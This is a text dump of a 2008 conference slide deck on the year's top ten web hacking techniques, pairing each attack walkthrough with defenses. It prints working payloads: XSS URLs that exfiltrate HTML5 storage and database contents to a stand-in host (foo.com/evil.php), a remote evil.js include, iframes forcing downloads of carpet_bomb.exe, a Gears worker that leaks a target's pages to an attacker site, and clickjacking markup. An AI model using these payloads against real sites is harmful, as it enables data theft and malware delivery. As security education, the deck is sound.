SlideShare a Scribd company logo
1 of 50
Download to read offline
Top Ten
   Web Hacking Techniques


                                     2008
Jeremiah Grossman
Founder & Chief Technology Officer
Top Ten Web Hacking Techniques (2008)

 Jeremiah Grossman
• WhiteHat Security Founder & CTO
• Technology R&D and industry evangelist
 (InfoWorld's CTO Top 25 for 2007)
• Frequent international conference speaker
• Co-founder of the Web Application Security Consortium
• Co-author: Cross-Site Scripting Attacks
• Former Yahoo! information security officer




                                                            © 2009 WhiteHat, Inc. | Page 2
Top Ten Web Hacking Techniques (2008)

WhiteHat Security
• 200+ enterprise customers
 • Start-ups to Fortune 500
• Flagship offering “WhiteHat Sentinel Service”
 • 1000’s of assessments performed annually
• Recognized leader in website security
 • Quoted hundreds of times by the mainstream press




                                                                   © 2009 WhiteHat, Inc. | Page 3
Top Ten Web Hacking Techniques (2008)




MUST be able to protect against   MUST be able to protect against
HOSTILE WEB USER                  HOSTILE WEB PAGE



                                                     © 2009 WhiteHat, Inc. | Page 4
Top Ten Web Hacking Techniques (2008)




2008’s
New Web Hacking
Techniques    65 (2006)
                                                                               83 (2007)
http://jeremiahgrossman.blogspot.com/2009/02/top-ten-web-hacking-techniques-
of-2008.html




                                       70 (2008)                                    © 2009 WhiteHat, Inc. | Page 5
Top Ten Web Hacking Techniques (2008)
CUPS Detection                                                   Firefox cross-domain information theft (simple text strings, some CSV)
CSRFing the uTorrent plugin                                      Firefox 2 and WebKit nightly cross-domain image theft
Clickjacking / Videojacking                                      Browser's Ghost Busters
Bypassing URL AuthC and AuthZ with HTTP Verb Tampering           Exploiting XSS vulnerabilities on cookies
I used to know what you watched, on YouTube                      Breaking Google Gears' Cross-Origin Communication Model
Safari Carpet Bomb                                               Flash Parameter Injection
Flash clipboard Hijack                                           Cross Environment Hopping
Flash Internet Explorer security model bug                       Exploiting Logged Out XSS Vulnerabilities
Frame Injection Fun                                              Exploiting CSRF Protected XSS
Free MacWorld Platinum Pass? Yes in 2008!                        ActiveX Repurposing
Diminutive Worm, 161 byte Web Worm                               Tunneling tcp over http over sql-injection
SNMP XSS Attack                                                  Arbitrary TCP over uploaded pages
Res Timing File Enumeration Without JavaScript in IE7.0          Local DoS on CUPS to a remote exploit via specially-crafted webpage
Stealing Basic Auth with Persistent XSS                          JavaScript Code Flow Manipulation
Smuggling SMTP through open HTTP proxies                         Common localhost dns misconfiguration can lead to quot;same sitequot; scripting
Collecting Lots of Free 'Micro-Deposits'                         Pulling system32 out over blind SQL Injection
Using your browser URL history to estimate gender                Dialog Spoofing - Firefox Basic Authentication
Cross-site File Upload Attacks                                   Skype cross-zone scripting vulnerability
Same Origin Bypassing Using Image Dimensions                     Safari pwns Internet Explorer
HTTP Proxies Bypass Firewalls                                    IE quot;Print Table of Linksquot; Cross-Zone Scripting Vulnerability
Join a Religion Via CSRF                                         A different Opera
Cross-domain leaks of site logins via Authenticated CSS          Abusing HTML 5 Structured Client-side Storage
JavaScript Global Namespace Pollution                            SSID Script Injection
GIFAR                                                            DHCP Script Injection
HTML/CSS Injections - Primitive Malicious Code                   File Download Injection
Hacking Intranets Through Web Interfaces                         Navigation Hijacking (Frame/Tab Injection Attacks)
Cookie Path Traversal                                            UPnP Hacking via Flash
Racing to downgrade users to cookie-less authentication          Total surveillance made easy with VoIP phone
MySQL and SQL Column Truncation Vulnerabilities                  Social Networks Evil Twin Attacks
Building Subversive File Sharing With Client Side Applications   Recursive File Include DoS
Firefox XML injection into parse of remote XML                   Multi-pass filters bypass
                                                                 Session Extending
                                                                 Code Execution via XSS
                                                                 Redirector’s hell
                                                                 Persistent SQL Injection
                                                                 JSON Hijacking with UTF-7
                                                                 SQL Smuggling
                                                                 Abusing PHP Sockets
                                                                 CSRF on Novell GroupWise WebAccess




                                                                                                                © 2009 WhiteHat, Inc. | Page 6
Top Ten Web Hacking Techniques (2008)




Flash Parameter Injection
Flash Parameter Injection introduces a new way to inject values to global parameters in
Flash movies while the movie is embedded in it's original HTML environment. These
injected parameters can grant the attacker full control over the page DOM, as well as
control over other objects within the Flash movie. This can lead to more elaborate




                                                                 10
attacks that take advantage of the interaction between the Flash movie and the HTML
page in which it is embedded.




 By: Yuval Baror, Ayal Yogev, and Adi Sharabani
 http://blog.watchfire.com/wfblog/2008/10/flash-parameter.html
 http://blog.watchfire.com/FPI.pdf




                                                                              © 2009 WhiteHat, Inc. | Page 7
Top Ten Web Hacking Techniques (2008)


How it works
There are several different FPI variants. Most of the variants include tricking the server
into sending back a page where user input is interpreted as Flash parameters. This
allows an attacker to inject malicious global parameters to the Flash movie and exploit
Flash specific vulnerabilities.

ActionScript 2 code reading a global variable




                                                                          © 2009 WhiteHat, Inc. | Page 8
Top Ten Web Hacking Techniques (2008)

Passing arguments in an embedded URI




Passing arguments using 'flashvars'




DOM-based Flash parameter injection




                                                    © 2009 WhiteHat, Inc. | Page 9
Top Ten Web Hacking Techniques (2008)
Persistent Flash Parameter Injection




                                                    © 2009 WhiteHat, Inc. | Page 10
Top Ten Web Hacking Techniques (2008)

Defenses

User input must be sanitized according to context before
reflected back to the user. Extreme caution should be
taken when saving user input in Flash cookies.




                                                   © 2009 WhiteHat, Inc. | Page 11
Top Ten Web Hacking Techniques (2008)




ActiveX Repurposing
Multi-staged attack to get code execution on victims who were running




                                                                                       9
a vulnerable and popular SSL-VPN ActiveX control.




 By: Haroon Meer
 http://carnal0wnage.blogspot.com/2008/08/owning-client-without-and-exploit.html
 http://www.sensepost.com/blog/2237.html
 http://www.networkworld.com/news/2008/080708-black-hat-ssl-vpn-security.html




                                                                                        © 2009 WhiteHat, Inc. | Page 12
Top Ten Web Hacking Techniques (2008)


How it works




                            © 2009 WhiteHat, Inc. | Page 13
Top Ten Web Hacking Techniques (2008)

1. Client with control visits malicious page
2. Page instantiates control and offers an upgrade
3. new-config.txt downloads to c:predictable_locationnew-config.txt
4. Malicious page re-instantiates control with ini file == c:predictable_locationnew-
config.txt [new-config contains arbitrary commands as uninstall string]
5. Exectute the controls uninstall method:
6.The victims machine fires calc.exe &&.




                                                                                © 2009 WhiteHat, Inc. | Page 14
Top Ten Web Hacking Techniques (2008)

Defenses

Website:
ActiveX should make use of Sitelock wherever possible.

Web Browser:
Restrict ActiveX to the maximum degree possible.




                                                  © 2009 WhiteHat, Inc. | Page 15
Top Ten Web Hacking Techniques (2008)




Tunneling TCP over HTTP
over SQL-Injection
Create a TCP circuit through reDuh over squeeza by building the




                                                                         8
server component within SQL Servers CLR subsystem.




By: Glenn Willinson, Marco Slaviero and Haroon Meer
http://www.sensepost.com/research/reDuh/SensePost_2008.tgz




                                                                          © 2009 WhiteHat, Inc. | Page 16
Top Ten Web Hacking Techniques (2008)




             © 2009 WhiteHat, Inc. | Page 17
Top Ten Web Hacking Techniques (2008)




             © 2009 WhiteHat, Inc. | Page 18
Top Ten Web Hacking Techniques (2008)

Defenses

Good network architecture, solid application design,
database hardening.




                                                    © 2009 WhiteHat, Inc. | Page 19
Top Ten Web Hacking Techniques (2008)




Cross-domain leaks of site logins
via Authenticated CSS
Checks the contents of a stylesheet property value across domains.




                                                                                         7
The most reliable technique to determine whether the victim is logged-
in to a given website or not.




 By: Chris Evans and Michal Zalewski
 http://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html




                                                                                         © 2009 WhiteHat, Inc. | Page 20
Top Ten Web Hacking Techniques (2008)


How it works
Perform a cross-domain load of a stylesheet and then reading property values using
standard Javascript APIs. What makes it work on so many sites is that browsers will
load inline style definitions from HTML documents. In addition, stylesheet properties
differ wildly depending on whether a user is logged in or not.

<html><head>
<link rel=quot;stylesheetquot; href=quot;http://home.myspace.com/index.cfm?fuseaction=userquot;/>
<script>
function func() {
var ele = document.getElementById('blah');
alert(window.getComputedStyle(ele, null).getPropertyValue('margin-bottom'));
}
</script></head>
<body onload=quot;func()quot;>
<div id=quot;blahquot; class=quot;showquot;>
</body>
</html>

                                                                       © 2009 WhiteHat, Inc. | Page 21
Top Ten Web Hacking Techniques (2008)

Defenses


As a Web application, do not store anything sensitive (such as user-
identifying customizations) in stylesheet properties. If you must, make sure
to store the properties in their own CSS file and ensure the URL of that file
unguessable to attackers for a given victim user.




                                                              © 2009 WhiteHat, Inc. | Page 22
Top Ten Web Hacking Techniques (2008)




Abusing HTML 5 Structured
Client-side Storage
HTML5 has introduced three new powerful ways to save big amount of data on the client's PC through
the browser. Attackers could steal or modify sensitive data online or offline. If a web application which
uses this kind of client-side storage is vulnerable to XSS (Cross- site scripting) attacks we can use an




                                                                                6
attack payload to read or modify the content of known storage keys (session storage, global storage,
local storage or database storage) on the computer’s victim. If the web application loads data or code
from the local storage, could be also quite powerful to inject malicious code that will be executed every
time the web application will request it.




 By: Alberto Trivero
  http://trivero.secdiscover.com/html5whitepaper.pdf




                                                                                  © 2009 WhiteHat, Inc. | Page 23
Top Ten Web Hacking Techniques (2008)


How it works
     Storage Object Enumeration
var ss = quot;quot;;
for(i in window.sessionStorage) {
 ss += i + quot; quot;;
}

var ls = quot;quot;;
for(i = 0; i < localStorage.length; i++) {
 ls += localStorage.key(i) + quot; quot;;
}

Database Object Enumeration
var db = quot;quot;;
for(i in window) {
 if(window[i] == “[object Database]”) {
 db += i + “ “;
 }
}




                                                          © 2009 WhiteHat, Inc. | Page 24
Top Ten Web Hacking Techniques (2008)




Extracting Database Metadata

SELECT name FROM sqlite_master WHERE type='table'

SELECT sql FROM sqlite_master WHERE name='table_name'

SELECT sqlite_version()




                                                         © 2009 WhiteHat, Inc. | Page 25
Top Ten Web Hacking Techniques (2008)




   One Shot Attack
http://example.com/page.php?name=<script>document.write('<img
src=quot;http://foo.com/
evil.php?name=' %2B globalStorage[location.hostname].mykey %2B
'quot;>');</script>

http://example.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql
(quot;SELECT * FROM client_tbquot;, [], function(tx, result){ document.write('<img src=quot;http://
foo.com/evil.php?name=' %2B result.rows.item(0)['col_data'] %2B 'quot;>'); }); });</script>




                                                                         © 2009 WhiteHat, Inc. | Page 26
Top Ten Web Hacking Techniques (2008)

http://example.com/page.php?name=<script src=http://foo.com/evil.js></
script>




                                                            © 2009 WhiteHat, Inc. | Page 27
Top Ten Web Hacking Techniques (2008)

Defenses
Website: Avoid saving sensitive data on the users machine and clear
the client-side storage whenever possible.

Web Browser: Web users should check regularly the content of the
HTML5 client-side storage saved by their browser (delete?).

LSO Storage Locations:
Windows XP
$userApplication DataMacromediaFlash Player#SharedObjects

Windows Vista
$userAppDataRoamingMacromediaFlash Player#SharedObjects

Mac OS X
~/Library/Preferences/Macromedia/Flash Player/#SharedObjects

Linux
/home/$user/.macromedia/Flash_Player/#SharedObjects


                                                                © 2009 WhiteHat, Inc. | Page 28
Top Ten Web Hacking Techniques (2008)




A Different Opera
Exploit an XSS in opera:feature scheme leading to code execution by
abusing same origin policy.




By: Stefano Di Paola
http://www.wisec.it/sectou.php?id=49102ef18b7f3
http://aviv.raffon.net/2008/10/30/ADifferentOpera.aspx
http://seclists.org/fulldisclosure/2008/Oct/0401.html

                                                                     5© 2009 WhiteHat, Inc. | Page 29
Top Ten Web Hacking Techniques (2008)


How it works
1) CSRF a user from evilhost to opera:historysearch
•   Pre-existing XSS in opera:historysearch leads to writing in opera:* context.
     SOP matching is evaluated by comparing
           scheme1 + host1 + port1 == scheme2 + host2 + port2

   opera:* considered as:
       opera + null + null

2) Inject IFRAME to opera:config change the email client to arbitrary command
3) Open a window pointing to a quot;mailtoquot; scheme.




                                                                       © 2009 WhiteHat, Inc. | Page 30
Top Ten Web Hacking Techniques (2008)

Defenses

Upgrade to Opera => 9.62




                                        © 2009 WhiteHat, Inc. | Page 31
Top Ten Web Hacking Techniques (2008)




Clickjacking / Videojacking
Think of any button – image, link, form, etc. – on any website – that can appear between
the Web browser walls. This includes wire transfer on banks, DSL router buttons, Digg
buttons, CPC advertising banners, Netflix queue.




                                                                              4
Next consider that an attacker can invisibly hover these buttons below the user's mouse,
so that when a user clicks on something they visually see, they're actually clicking on
something the attacker wants them to.




By: Jeremiah Grossman and Robert Hansen
http://www.sectheory.com/clickjacking.htm
http://jeremiahgrossman.blogspot.com/2008/10/clickjacking-web-pages-can-see-and-hear.html
http://blogs.adobe.com/psirt/2008/10/clickjacking_security_advisory.html




                                                                                      © 2009 WhiteHat, Inc. | Page 32
Top Ten Web Hacking Techniques (2008)




             © 2009 WhiteHat, Inc. | Page 33
Top Ten Web Hacking Techniques (2008)

Hover Invisible IFRAMEs
                                     HTML, CSS, and JavaScript may
                                     size, follow the mouse and make
                                     transparent third-party IFRAME
                                     content.




  <iframe
    src=quot;http://victim/page.htmlquot;
    scrolling=quot;noquot;
    frameborder=quot;0quot;
    style=quot;opacity:.1;filter: alpha(opacity=.1); -moz-opacity:1.0;quot;>
  </iframe>

                                                        © 2009 WhiteHat, Inc. | Page 34
Top Ten Web Hacking Techniques (2008)

What if a Web page could See and Hear you?


       Clickjacking enables corporate
       espionage, government surveillance,
       home user spying, etc. Every computer
       with a webcam and/or a microphone
       becomes a remote monitoring device.




      JavaScript can’t access the webcam or microphone...


                                                         © 2009 WhiteHat, Inc. | Page 35
Top Ten Web Hacking Techniques (2008)




<div style=quot;opacity:.1;filter: alpha(opacity=.1); -moz-opacity:.9quot;>
<embed

      src=quot;vid.swfquot;

      type=quot;application/x-shockwave-flashquot;

      allowfullscreen=quot;falsequot;

      wmode=quot;transparentquot;>
</embed>
</div>


                                                           © 2009 WhiteHat, Inc. | Page 36
Top Ten Web Hacking Techniques (2008)


Defenses
Frame-busting code
<script>
if (window.top !== window.self) { setTimeout(function()
{document.body.innerHTML='';},1);window.self.onload=function(evt)
{document.body.innerHTML='';};}
</script>

/* IE 8 Only */
X-FRAME-OPTIONS: (DENY | SAMEORIGIN)


                         • Upgrade to Flash Player 10
                         • NoScript w/ ClearClick



                                                                      © 2009 WhiteHat, Inc. | Page 37
Top Ten Web Hacking Techniques (2008)




Safari Carpet Bomb
The Safari Carpet Bomb attack allows a malicious website controlled by an attacker to litter the
user's desktop on windows or the user's “Downloads” directory on OSX with arbitrary files and
malware. This vulnerability has the distinction of bringing the term quot;blended threatquot; into the




                                                                                          3
security vernacular because, if you are able to litter user's machines with arbitrary files, you can
further the impact and affect other applications that trust content on the local filesystem.




 By: Nitesh Dhanjani
  http://www.dhanjani.com/blog/2008/05/safari-carpet-b.html
  http://www.oreillynet.com/onlamp/blog/2008/05/safari_carpet_bomb.html
  http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx




                                                                                       © 2009 WhiteHat, Inc. | Page 38
Top Ten Web Hacking Techniques (2008)


How it works
When the Safari browser is served a file with a content-type that cannot be rendered
by the browser, it automatically downloads it do the default download location
(desktop on Windows, Downloads directory on OSX) without notifying or asking the
user. This allows a malicious website to litter the user's Desktop or download
directory with arbitrary files, including malware.

<HTML>
<iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe>
<iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe>
<iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe>
...
...
<iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe>
</HTML>




                                                                       © 2009 WhiteHat, Inc. | Page 39
Top Ten Web Hacking Techniques (2008)




             © 2009 WhiteHat, Inc. | Page 40
Top Ten Web Hacking Techniques (2008)

Defenses
Windows: Download the latest version of Safari

OS X: Versions of Safari remain un-patched by Apple.




                                                 © 2009 WhiteHat, Inc. | Page 41
Top Ten Web Hacking Techniques (2008)




Breaking Google Gears' Cross-
Origin Communication Model
Under some circumstances the cross-origin communication security model




                                                                                                         2
of Google Gears could be bypassed. An attacker could gain access to
sensitive resources of the victim in other websites (even those that does not
use Google Gears) - mainly ones that contain users' content (forums, web-
mails, social networks, office-like services, etc.).



By: Yair Amit
 http://blog.watchfire.com/wfblog/2008/12/breaking-google-gears-cross-origin-communication-model.html




                                                                                                           © 2009 WhiteHat, Inc. | Page 42
Top Ten Web Hacking Techniques (2008)


Google Gears Workers
var wp = google.gears.workerPool;
wp.allowCrossOrigin();
wp.onmessage = function(a, b, message) {
    var request = google.gears.factory.create('beta.httprequest');
    request.open('GET', 'http://TARGET.SITE/SENSITIVE_PAGE.htm');
    request.onreadystatechange = function() {
     if (request.readyState == 4) {
  wp.sendMessage(quot;The response was: quot; + request.responseText,
message.sender);
     }
    };
request.send();
}




                                                                         © 2009 WhiteHat, Inc. | Page 43
Top Ten Web Hacking Techniques (2008)


Attack Flow
 1. Attacker creates a text file that contains (malicious) Google Gears commands
(Accessing the DB, using the HttpRequest module, etc.).

2. Attacker finds a way to put the text content into a target domain (http://
TARGET.SITE/Upload/innocent.jpg). The Gears quot;workerquot; code does not contain
suspicious characters (<,>, etc...), it is therefore less likely to be filtered by http://
TARGET.SITE's server-side logic.

3. Attacker creates http://ATTACKER.SITE/attack.html which contains some Google
Gears code that loads and executes http://TARGET.SITE/Upload/innocent.jpg

4. The code embedded in innocent.jpg runs in the context of http://TARGET.SITE. It
therefore has permissions to access Google Gears client-side objects such as the
DB, the local server data or web resources (with the victim's credentials) using the
HttpRequest module built into Google Gears.

5. All information collected in the previous phase can easily be leaked back to http://
ATTACKER.SITE using Google Gears' standard messaging mechanism.



                                                                             © 2009 WhiteHat, Inc. | Page 44
Top Ten Web Hacking Techniques (2008)

Defenses

Update Google Gears.
(Content-Type header value (application/x-gears-worker)

Web developers who rely on Google Gears should be aware that the fix
might require some changes, such as creating a special rule in the Web
server for serving Google-Gears worker code files.




                                                            © 2009 WhiteHat, Inc. | Page 45
Top Ten Web Hacking Techniques (2008)




             © 2009 WhiteHat, Inc. | Page 46
Top Ten Web Hacking Techniques (2008)




GIFAR
A content ownership issue taking advantage of flimsy security controls on both the
server side and the client side. What's new is appending a Java Applet (in the form
of a JAR) at the end of another file that would be commonly allowed in file uploads




                                                                                   1
on web applications, such as images, word documents, audio/video files, just about
anything.




By: Billy Rios, Nathan McFeters, Rob Carter, and John Heasman
http://riosec.com/how-to-create-a-gifar
http://xs-sniper.com/blog/2008/12/17/sun-fixes-gifars/
http://blogs.zdnet.com/security/?p=1619




                                                                       © 2009 WhiteHat, Inc. | Page 47
Top Ten Web Hacking Techniques (2008)


How it works


      GIF


     JAR


                            © 2009 WhiteHat, Inc. | Page 48
Top Ten Web Hacking Techniques (2008)

Defenses


Website:
Do not accept file uploads
Host uploaded content on throw away domains or IP addresses
Convert all content

Web Browser:
a) Disable third-party browser extensions
b) Install the latest JVM and remove older versions




                                                            © 2009 WhiteHat, Inc. | Page 49
Thank You!
Jeremiah Grossman
Blog: http://jeremiahgrossman.blogspot.com/
Twitter: http://twitter.com/jeremiahg
Email: jeremiah@whitehatsec.com

WhiteHat Security
http://www.whitehatsec.com/

More Related Content

What's hot

Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for DevelopersMike North
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotJeremiah Grossman
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the WebMike Crabb
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsSecuRing
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStoragetomasperezv
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowAyoma Wijethunga
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application DefenseFrank Kim
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Java EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishMarkus Eisele
 

What's hot (20)

Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for Developers
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorage
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Java EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFish
 

Viewers also liked

Grow Hack Athens Pt.1: Growth Hacking For Web Apps
Grow Hack Athens Pt.1: Growth Hacking For Web AppsGrow Hack Athens Pt.1: Growth Hacking For Web Apps
Grow Hack Athens Pt.1: Growth Hacking For Web AppsGrowthRocks
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern timesjeshin jose
 
Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websitesshehab najjar
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingNeel Kamal
 
Embedded device hacking Session i
Embedded device hacking Session iEmbedded device hacking Session i
Embedded device hacking Session iMalachi Jones
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its typesSai Sakoji
 
Webinar Gratuito: "JavaScript para Hacking Web"
Webinar Gratuito: "JavaScript para Hacking Web"Webinar Gratuito: "JavaScript para Hacking Web"
Webinar Gratuito: "JavaScript para Hacking Web"Alonso Caballero
 
Professzionális WLAN tervezés és minősítés
Professzionális WLAN tervezés és minősítésProfesszionális WLAN tervezés és minősítés
Professzionális WLAN tervezés és minősítésZsolt Kecskemeti
 
Panda Security stratégia és vírusvédelmi jövőkép 2020-ig
Panda Security stratégia és vírusvédelmi jövőkép 2020-igPanda Security stratégia és vírusvédelmi jövőkép 2020-ig
Panda Security stratégia és vírusvédelmi jövőkép 2020-igpandahu
 
IPTV rendszerek diplomamunka prezentáció
IPTV rendszerek diplomamunka prezentációIPTV rendszerek diplomamunka prezentáció
IPTV rendszerek diplomamunka prezentációDávid Károly
 
Mit hoz a jövő Ramiris Szoftvernap
Mit hoz a jövő   Ramiris SzoftvernapMit hoz a jövő   Ramiris Szoftvernap
Mit hoz a jövő Ramiris Szoftvernappandahu
 
Acc tutorial 9
Acc tutorial 9Acc tutorial 9
Acc tutorial 9Shu Shin
 
Wireless network security (in Hungarian)
Wireless network security (in Hungarian)Wireless network security (in Hungarian)
Wireless network security (in Hungarian)Csaba Krasznay
 
Reflective Audio Journaling
Reflective Audio JournalingReflective Audio Journaling
Reflective Audio JournalingBernard Goldbach
 
Ethical hacking a licence to hack
Ethical hacking a licence to hackEthical hacking a licence to hack
Ethical hacking a licence to hackamrutharam
 
Lecture 15 fraud schemes - james a. hall book chapter 3
Lecture 15  fraud schemes - james a. hall book chapter 3Lecture 15  fraud schemes - james a. hall book chapter 3
Lecture 15 fraud schemes - james a. hall book chapter 3Habib Ullah Qamar
 

Viewers also liked (20)

Grow Hack Athens Pt.1: Growth Hacking For Web Apps
Grow Hack Athens Pt.1: Growth Hacking For Web AppsGrow Hack Athens Pt.1: Growth Hacking For Web Apps
Grow Hack Athens Pt.1: Growth Hacking For Web Apps
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
 
Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websites
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Embedded device hacking Session i
Embedded device hacking Session iEmbedded device hacking Session i
Embedded device hacking Session i
 
Hacking ppt
Hacking pptHacking ppt
Hacking ppt
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
 
Webinar Gratuito: "JavaScript para Hacking Web"
Webinar Gratuito: "JavaScript para Hacking Web"Webinar Gratuito: "JavaScript para Hacking Web"
Webinar Gratuito: "JavaScript para Hacking Web"
 
Ruxmon.2015-08.-.proxenet
Ruxmon.2015-08.-.proxenetRuxmon.2015-08.-.proxenet
Ruxmon.2015-08.-.proxenet
 
It3 4 3 2 1
It3 4 3 2 1It3 4 3 2 1
It3 4 3 2 1
 
Professzionális WLAN tervezés és minősítés
Professzionális WLAN tervezés és minősítésProfesszionális WLAN tervezés és minősítés
Professzionális WLAN tervezés és minősítés
 
Panda Security stratégia és vírusvédelmi jövőkép 2020-ig
Panda Security stratégia és vírusvédelmi jövőkép 2020-igPanda Security stratégia és vírusvédelmi jövőkép 2020-ig
Panda Security stratégia és vírusvédelmi jövőkép 2020-ig
 
IPTV rendszerek diplomamunka prezentáció
IPTV rendszerek diplomamunka prezentációIPTV rendszerek diplomamunka prezentáció
IPTV rendszerek diplomamunka prezentáció
 
Mit hoz a jövő Ramiris Szoftvernap
Mit hoz a jövő   Ramiris SzoftvernapMit hoz a jövő   Ramiris Szoftvernap
Mit hoz a jövő Ramiris Szoftvernap
 
Acc tutorial 9
Acc tutorial 9Acc tutorial 9
Acc tutorial 9
 
Wireless network security (in Hungarian)
Wireless network security (in Hungarian)Wireless network security (in Hungarian)
Wireless network security (in Hungarian)
 
Reflective Audio Journaling
Reflective Audio JournalingReflective Audio Journaling
Reflective Audio Journaling
 
Ethical hacking a licence to hack
Ethical hacking a licence to hackEthical hacking a licence to hack
Ethical hacking a licence to hack
 
Lecture 15 fraud schemes - james a. hall book chapter 3
Lecture 15  fraud schemes - james a. hall book chapter 3Lecture 15  fraud schemes - james a. hall book chapter 3
Lecture 15 fraud schemes - james a. hall book chapter 3
 

Similar to Top Ten Web Hacking Techniques (2008)

MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
 
Website security systems
Website security systemsWebsite security systems
Website security systemsMobile88
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
